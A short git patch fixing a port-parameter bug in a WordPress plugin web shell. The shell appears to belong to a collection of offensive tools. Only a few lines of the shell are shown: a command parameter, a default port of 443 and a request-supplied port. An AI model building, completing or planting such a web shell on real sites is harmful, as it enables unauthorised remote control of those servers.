From 60ac22495009113d588a028451e7f225944032ef Mon Sep 17 00:00:00 2001 From: Cameron Unterberger Date: Mon, 18 Apr 2022 20:54:43 -0400 Subject: [PATCH] fix logic bug setting port number --- Web-Shells/WordPress/plugin-shell.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Web-Shells/WordPress/plugin-shell.php b/Web-Shells/WordPress/plugin-shell.php index bac69fc9..6df1ede3 100755 --- a/Web-Shells/WordPress/plugin-shell.php +++ b/Web-Shells/WordPress/plugin-shell.php @@ -30,7 +30,7 @@ if(isset($_REQUEST[$cmd])) { # default port 443 $port = '443'; - if(isset($_REQUEST[$ip])){ + if(isset($_REQUEST[$port])){ $port = $_REQUEST[$port]; }